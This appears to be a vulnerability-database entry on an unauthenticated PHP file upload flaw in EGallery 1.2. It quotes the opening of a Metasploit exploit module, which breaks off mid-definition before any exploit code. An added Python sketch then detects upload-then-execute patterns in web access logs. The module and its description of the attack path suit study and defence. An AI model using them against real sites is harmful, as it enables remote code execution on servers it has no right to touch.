EGallery PHP file upload flaws and fixes-vulnerability warning-the black bar safety net

2012-07-28T00:00:00
ID MYHACK58:62201234458
Type myhack58
Reporter Anonymous
Modified 2012-07-28T00:00:00

Description

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "EGallery PHP File Upload Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in EGallery 1.2. By abusing the
        uploadify.php file, a malicious user can upload a file to the egallery/ directory
        without any authentication, which results in arbitrary code execution. The module
        has been tested successfully on Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Sammy FORGIT', # Discovery, PoC
          'juan' # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '83891'],
          ['BID', '54464'],
          ['URL', 'http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [

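A log-triage sketch for the behaviour the module description states: an unauthenticated upload through uploadify.php, followed by execution of the uploaded file from the egallery/ directory. This is an added example, not part of the original page or of the Metasploit module. The Apache "combined" log format, the location of uploadify.php under /egallery/, the function name, and every sample line are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log line (assumed format).
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)

# Constructed sample input, not taken from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Jul/2012:10:00:01 +0000] "GET /egallery/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [28/Jul/2012:10:02:11 +0000] "POST /egallery/uploadify.php HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.9 - - [28/Jul/2012:10:02:12 +0000] "GET /egallery/kq7x.php HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.7 - - [28/Jul/2012:10:03:40 +0000] "GET /egallery/index.php?page=2 HTTP/1.1" 200 4880 "-" "Mozilla/5.0"',
]

def find_upload_then_exec(lines, upload_dir="/egallery/"):
    """Return (upload, hit) pairs: a successful POST to uploadify.php followed
    by a successful request for a script under upload_dir that was never
    requested before that POST (scripts seen earlier count as baseline)."""
    seen_scripts, uploads, findings = set(), [], []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = urlsplit(m["target"]).path  # drop the query string
        name = path.rsplit("/", 1)[-1]
        ev = {"ip": m["ip"], "ts": m["ts"], "method": m["method"],
              "path": path, "status": int(m["status"])}
        if ev["method"] == "POST" and name.lower() == "uploadify.php":
            if ev["status"] < 400:
                uploads.append(ev)
            continue
        if upload_dir in path and SCRIPT_EXT.search(name):
            # First sighting of this script, and an upload preceded it.
            if path not in seen_scripts and uploads and ev["status"] < 400:
                findings.append((uploads[-1], ev))
            seen_scripts.add(path)
    return findings

if __name__ == "__main__":
    for upload, hit in find_upload_then_exec(SAMPLE_LOG):
        print(f'{upload["ts"]} upload from {upload["ip"]} -> '
              f'{hit["ts"]} first request for {hit["path"]} from {hit["ip"]}')
```

Any anonymous POST to uploadify.php is worth reviewing on its own, since the description says the endpoint requires no authentication; the pairing with a newly requested script is what separates a likely compromise from a probe.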